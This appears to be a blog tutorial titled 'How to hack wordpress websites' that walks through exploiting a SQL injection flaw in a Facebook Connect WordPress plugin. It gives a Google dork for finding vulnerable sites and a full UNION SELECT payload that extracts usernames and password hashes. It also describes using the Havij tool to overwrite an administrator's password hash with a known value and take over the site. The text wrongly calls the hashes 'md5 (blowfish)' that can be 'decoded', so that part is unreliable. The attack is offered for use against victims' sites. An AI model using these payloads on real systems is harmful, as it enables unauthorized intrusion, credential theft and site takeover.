How to hack wordpress websites | SQli vulnerability & exploit

There is so many Pepoles using Facebook Connect Wordpress plugin for their blogs. They think it's cool. But it could be a Big Security hole. Here's the way to hack these sites.Step 1 : http://www.google.com

Step 2:Now enter this dork to find sites with security hole..

inurl:"fbconnect_action=myhome"

 Step 3: You will find many sites, Select the site which you are comfortable with. 

You will find something like that.

Step 4: Now replace 

?fbconnect_action=myhome&userid=

with this 

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

Step 5: Now you have the User name and Password.

Step 6: The password is encrypted with Wordpress md5 (blowfish). You need to decode this. 

Step 7: Then find the administrator panel out. Normally it should be in 

www.victrimsite.com/wp-admin

or 

www.victrimsite.com/wp-login.php

Note: Decoding this type of password may take a big time.

So you here is another way to hack the password.....


Step 1: Open Havij and paste the blog url you are going to hack..

Example: 

http://www.victrimsite.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users--

Step 2: Now find Databases, Tables.

Step 3: Select wp-users then find tick on all columns. Then click on Get Data.

Step 4: You will find something like that..

Step 5: Now select any user and change the user_pass to 

$P$BbCzkVXQ6r.T8znShDPMSzM7Whhubc/

Step 6: Now login with the password hackintruths .




credits to: Devilscafe.in